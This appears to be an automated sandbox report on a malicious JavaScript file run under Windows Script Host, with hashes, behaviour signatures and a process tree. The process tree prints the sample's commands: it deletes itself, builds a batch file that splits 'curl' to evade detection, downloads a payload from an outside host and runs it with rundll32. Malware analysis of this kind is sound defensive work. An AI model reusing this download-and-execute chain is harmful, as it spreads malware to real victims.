Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
15-11-2023 19:31
Static task
static1
Behavioral task
behavioral1
Sample
2da0b937-aa51-3ea7-a191-69aa951fe75b.js
Resource
win7-20231025-en
General
-
Target
2da0b937-aa51-3ea7-a191-69aa951fe75b.js
-
Size
54KB
-
MD5
e11d27dad9d6a484061fed8406b1b4ba
-
SHA1
7a97b146c0ecac61b41a267b45c66fb9ae9e26cd
-
SHA256
bef13d6455aa5e949c2952d609fd09e34e53b7ead3b3d84c3018e489fb1f027f
-
SHA512
d0c0db630c0dc813898989cb437d2922e5a53c14792a3487ce560bace02ea6ea50af669e134850a2ec5ef1f3fce08a716a01f166f7b467b39ec042c38c00e1c5
-
SSDEEP
768:eO9Gvm/iZquBaXkiEhLGgwHi+7GobjM2Eg60cvmqr:eO9GddwHi+7xjVEvZvmI
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2080 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2080 2136 wscript.exe 28 PID 2136 wrote to memory of 2080 2136 wscript.exe 28 PID 2136 wrote to memory of 2080 2136 wscript.exe 28 PID 2136 wrote to memory of 2108 2136 wscript.exe 31 PID 2136 wrote to memory of 2108 2136 wscript.exe 31 PID 2136 wrote to memory of 2108 2136 wscript.exe 31 PID 2108 wrote to memory of 2632 2108 cmd.exe 33 PID 2108 wrote to memory of 2632 2108 cmd.exe 33 PID 2108 wrote to memory of 2632 2108 cmd.exe 33 PID 2108 wrote to memory of 2660 2108 cmd.exe 32 PID 2108 wrote to memory of 2660 2108 cmd.exe 32 PID 2108 wrote to memory of 2660 2108 cmd.exe 32 PID 2136 wrote to memory of 2768 2136 wscript.exe 34 PID 2136 wrote to memory of 2768 2136 wscript.exe 34 PID 2136 wrote to memory of 2768 2136 wscript.exe 34 PID 2136 wrote to memory of 2812 2136 wscript.exe 36 PID 2136 wrote to memory of 2812 2136 wscript.exe 36 PID 2136 wrote to memory of 2812 2136 wscript.exe 36 PID 2136 wrote to memory of 2044 2136 wscript.exe 38 PID 2136 wrote to memory of 2044 2136 wscript.exe 38 PID 2136 wrote to memory of 2044 2136 wscript.exe 38 PID 2136 wrote to memory of 1264 2136 wscript.exe 40 PID 2136 wrote to memory of 1264 2136 wscript.exe 40 PID 2136 wrote to memory of 1264 2136 wscript.exe 40
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js"2⤵
- Deletes itself
PID:2080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\cumque.q.bat""3⤵PID:2660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo rl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" --output "C:\Users\Admin\AppData\Local\Temp\\vero.q" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"2⤵PID:2812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"2⤵PID:2044
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\\vero.q" scab /k redit7392⤵PID:1264
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
170B
MD51198fa4486b382bc05b322fe52655020
SHA12d72bab9a1d3fdb868a55c169cd4b30a650f6f84
SHA2564d7c7e32ed6a3bd24f3e2e32b2ace831349c0caace4e7c1d3fd6d065f269b8bc
SHA512a30e51cf8ae6a6b62717d5f7ed1d0bdd32eefd3c4780a5a2d1ec7322885304c200aa1b5f8e1eedd5e7b0fa0ace384fb1452cb9c9c58bde92833772e88baa5d9f
-
Filesize
170B
MD51198fa4486b382bc05b322fe52655020
SHA12d72bab9a1d3fdb868a55c169cd4b30a650f6f84
SHA2564d7c7e32ed6a3bd24f3e2e32b2ace831349c0caace4e7c1d3fd6d065f269b8bc
SHA512a30e51cf8ae6a6b62717d5f7ed1d0bdd32eefd3c4780a5a2d1ec7322885304c200aa1b5f8e1eedd5e7b0fa0ace384fb1452cb9c9c58bde92833772e88baa5d9f